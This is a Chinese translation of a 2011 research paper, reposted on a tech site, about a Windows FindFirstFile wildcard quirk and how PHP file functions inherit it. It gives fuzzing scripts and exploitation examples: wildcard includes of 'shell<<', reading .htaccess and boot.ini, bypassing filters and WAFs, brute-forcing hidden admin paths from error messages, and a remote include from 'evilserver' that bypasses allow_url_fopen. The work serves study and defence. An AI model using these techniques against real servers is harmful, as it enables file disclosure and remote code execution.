1.開場白

此次所披露的是以下網頁中提出的問題所取得的測試結果：
http://code.google.com/p/pasc2at/wiki/SimplifiedChinese

<?phpfor ($i=0; $i<255; $i++) {$url = '1.ph' . chr($i);$tmp = @file_get_contents($url);if (!empty($tmp)) echo chr($i) . "/r/n";}?>

已知1.php存在，以上腳本訪問的結果是：

1.php1.php1.ph<1.ph>

都能得到返回。
前兩種能返回結果是總所周知的（因為windows的文件系統支持大小的互轉的機制），另外的兩種返回引起了我們的注意。
測試php版本：php4.9,php5.2,php5.3,php6.0
測試系統：WINXP SP3 X32,WINXP SP2 X64，WIN7,WIN2K3
經測試我們得出的結論是：該漏洞影響所有的windows+php版本 

2.深入探查模糊測試的結果

為了繼續深入探查關于該bug的信息，我們對demo做了些許修改:

<?phpfor ($j=0; $i<256; $j++) {for ($i=0; $i<256; $i++) {$url = '1.p' . chr($j) . chr($i);$tmp = @file_get_contents($url);if (!empty($tmp)) echo chr($j) . chr($i) . "/r/n";}}?>

在調試php解釋器的過程中，我們將此“神奇”的漏洞歸結為一個Winapi 函數FindFirstFile(）所產生的結果(http://msdn.microsoft.com/en-us/library/aa364418(v=vs.85).ASPx).更好玩的是，當跟蹤函數調用棧的過程中我們發現字符”>”被替換成”?”，字符”<”被替換成”*”，而符號”（雙引號）被替換成一個”.”字符。這在2007年msdn公開的文檔中被提及：http://msdn.microsoft.com/en-us/library/community/history/aa364418%28v=vs.85%29.ASPx?id=3
但是此bug至今未被任何windows旗下所發行的任何版本修復！
我們要闡明的是，該函數FindFirstFile()在php下的運用遠遠不至于file_get_contents().關于該bug可以利用的函數我們已經列了如下一表：

 
此外，我們還發現該利用也可以被運用到c++中，以下采用來自msdn的例子：

#include <windows.h>#include <tchar.h>#include <stdio.h>void _tmain(int argc, TCHAR *argv[]){WIN32_FIND_DATA FindFileData;HANDLE hFind;if( argc != 2 ){_tprintf(TEXT("Usage: %s [target_file]/n"), argv[0]);return;}_tprintf (TEXT("Target file is %s/n"), argv[1]);hFind = FindFirstFile(argv[1], &FindFileData);if (hFind == INVALID_HANDLE_VALUE){printf ("FindFirstFile failed (%d)/n", GetLastError());return;}else{_tprintf (TEXT("The first file found is %s/n"),FindFileData.cFileName);FindClose(hFind);}}

當傳入參數”c:/bo<”時，成功訪問到boot.ini文件。

3.利用方法總結

當調用FindFirstFile()函數時，”<”被替換成”*”,這意味該規則可以使”<”替換多個任意字符，但是測試中發現并不是所有情況都如我們所愿。所以，為了確保能夠使”<”被替換成”*”,應當采用”<<”
EXAMPLE:include(‘shell<');  或者include(‘shell<<');    //當文件夾中超過一個以shell打頭的文件時，該執行取按字母表排序后的第一個文件。
當調用FindFirstFile()函數時，”>”被替換成”?”,這意味這”>”可以替換單個任意字符
EXAMPLE：include(‘shell.p>p');    //當文件中超過一個以shell.p?p 通配時，該執行取按字母表排序后的第一個文件。
當調用FindFirstFile()函數時，”””(雙引號)被替換成”.”
EXAMPLE:include(‘shell”php');    //===>include(‘shell.php');
如果文件名第一個字符是”.”的話，讀取時可以忽略之
EXAMPLE：fopen(‘.htacess');  //==>fopen(‘htacess');   //加上第一點中的利用 ==>fopen(‘h<<');
文件名末尾可以加上一系列的/或者/的合集，你也可以在/或者/中間加上.字符，只要確保最后一位為”.”
EXAMPLE：fopen(“config.ini//.// //////.”);==>  fopen(‘config.ini/././.'); ==>fopen(‘config.ini/////.')==>fopen(‘config.ini…..')   //譯者注：此處的利用我不是很理解，有何作用？截斷？
該函數也可以調用以”//”打頭的網絡共享文件，當然這會耗費不短的時間。補充一點，如果共享名不存在時，該文件操作將會額外耗費4秒鐘的時間，并可能觸發時間響應機制以及max_execution_time拋錯。所幸的是，該利用可以用來繞過allow_url_fopen=Off 并最終導致一個RFI（遠程文件包含）
EXAMPLE：include (‘//evilserver/shell.php');
用以下方法還可以切換文件的盤名
include(‘//./C:/my/file.php/../../../D:/anotherfile.php');
選擇磁盤命名語法可以用來繞過斜線字符過濾
file_get_contents(‘C:boot.ini'); //==>  file_get_contents (‘C:/boot.ini');
在php的命令行環境下（php.exe）,關于系統保留名文件的利用細節
EXAMPLE:file_get_contents(‘C:/tmp/con.jpg'); //此舉將會無休無止地從CON設備讀取0字節，直到遇到eof
EXAMPLE:file_put_contents(‘C:/tmp/con.jpg',chr(0×07));  //此舉將會不斷地使服務器發出類似嗶嗶的聲音

4.更深入的利用方法

除了以上已經展示的方法，你可以用下面的姿勢來繞過WAF或者文件名過濾
請思考該例：

<?phpfile_get_contents("/images/".$_GET['a'].".jpg");//or another function from Table 1, i.e. include().?>

訪問test.php?a=../a<%00
可能出現兩種結果

Warning: include(/images/../a<) [function.include]: failed to open stream:Invalid argument in。。。Warning: include(/images/../a<) [function.include]: failed to open stream:Permission denied。。

如果是第一種情況，說明不存在a打頭的文件，第二種則存在。
 
此外，有記錄顯示，有時網站會拋出如下錯誤：

Warning: include(/admin_h1d3) [function.include]: failed to open stream: Permission denied..

這說明該文件夾下存在一個以上以a打頭的文件（夾），并且第一個就是admin_h1d3。

5.結論
實驗告訴我們，php本身沒有那么多的漏洞，我們所看到是：過分的依賴于另一種程序語言（注：如文中的漏洞產自與winapi的一個BUG），并且直接強 制使用，將會導致細微的錯誤(bug)，并最終造成危害(vul).這樣便拓寬了模糊測試的范疇（譯者注：并不僅僅去研究web層面，而深入到系統底層），并最終導致IDS，IPS的規則更新。誠然，代碼需要保護，需要補丁，需要升級與擴充。但是，這并不是我們真正要去關注的問題。在當下，我認為我們 更謹慎地去書寫更多更嚴厲的過濾規則，正如我們一直在做的一樣。任重道遠，精益求精。
因為這是基礎應用層的問題，所以我們猜想類似的問題可能出現在其他web應用中。于是我們還測試了mysql5,而實驗結果表明，mysql5并不存在類似的漏洞。但是我們仍認為：類似的漏洞將會出現在諸如Perl、Python、Ruby等解釋性語言上。

6.Referer

php application source code audits advanced technology:http://code.google.com/p/pasc2at/wiki/SimplifiedChineseMSDN FindFirstFile Function reference:http://msdn.microsoft.com/en-us/library/aa364418(v=vs.85).ASPxMSDN comments history:http://msdn.microsoft.com/en-us/library/community/history/aa364418(v=vs.85).ASPx?id=3MSDN article «Naming Files, Paths, and Namespaces»:http://msdn.microsoft.com/en-us/library/aa365247(v=vs.85).ASPxTechNET article «Managing Files and Directories»:http://techNET.microsoft.com/en-us/library/cc722482.ASPxPaper «Technique of quick exploitation of 2blind SQL Injection»:http://www.exploit-db.com/papers/13696/

 ==================================================================
全文完。
注：該文是2011年底發表的一篇白皮書，至今該bug依然存在。我在幾個月前做CUIT的一個CTF時偶遇了一道該bug的利用，當時便是看的此文，當時只是粗粗讀了一下，寫了一個php的腳本去跑目錄。今回閑來無事，翻譯整理了一番。

php技術：windows的文件系統機制引發的PHP路徑爆破問題分析，轉載需保留來源！

鄭重聲明：本文版權歸原作者所有，轉載文章僅為傳播更多信息之目的，如作者信息標記有誤，請第一時間聯系我們修改或刪除，多謝。